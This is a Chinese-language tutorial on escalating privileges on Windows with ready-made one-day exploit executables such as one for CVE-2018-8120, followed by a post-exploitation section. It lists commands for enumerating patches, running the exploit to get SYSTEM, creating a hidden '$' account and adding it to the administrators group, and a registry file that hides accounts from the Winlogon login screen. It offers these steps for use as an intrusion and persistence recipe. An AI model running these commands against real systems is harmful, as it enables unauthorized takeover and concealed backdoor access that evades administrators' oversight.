Windows下的本地提权漏洞梳理及后渗透简析

1.github网址，截图，不同系统版本对应的漏洞

2.后渗透阶段

 

壹   通过1day漏洞进行Windows本地提权

分享一个github链接：Windows提权漏洞整理

里面大部分是基于x64系统的漏洞直接利用程序exe，傻瓜式操作，一键提权

C:\Users\Knownsec.zyg>
C:\Users\Knownsec.zyg>xxxx.exe "whoami"
C:\Users\Knownsec.zyg>

粘一个大佬分享的截图：

提权前若是能够查看该系统的补丁那是更美妙的事情了：

C:\Users\Knownsec.zyg>systeminfo

C:\Users\Knownsec.zyg>wmic qfe list full /format:htable >C:\Users\Knownsec.zyg\Desktop\hotfixes.htm

这个命令会导出一个html，里面存放了每一个补丁安装的时间，由此可以推测该系统最后一个补丁的时间，查询1day提权漏洞

若是已经发现合适的漏洞并对其进行利用的话，成功效果图如下：

这便是利用CVE-2018-8120的x86版脚本直接提权，“whoami”后返回当前用户显示已经为“system”

 

 

 

 

贰   后渗透阶段

现在我们已经有了一个基于system超级用户的权限窗口，但是这个窗口功能过于单一，我们可控的权限仍然没有提升，可以通过这个窗口，进行下一步的提权后渗透：

思路：基于system的dos创建隐藏用户，将隐藏用户加入administrators用户组以获得管理员权限

C:\Users\Knownsec.zyg>xxxx.exe "net user"                   #查看当前所有用户
C:\Users\Knownsec.zyg>xxxx.exe "net user 用户名$ 密码 /add"  #添加该用户
C:\Users\Knownsec.zyg>xxxx.exe "net localgroup administrastors username /add"              
                                                            #将该用户拉入管理员组以获得管理员权限
C:\Users\Knownsec.zyg>xxxx.exe "net user"                   #查看用户发现没有该隐藏用户

或者再：

用记事本建个文本文件，输入以下内容（用户名自行修改），另存为.reg注册表文件后双击导入即可：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"隐藏用户名1"=dword:00000000
"隐藏用户名2"=dword:00000000

二合一食用效果更佳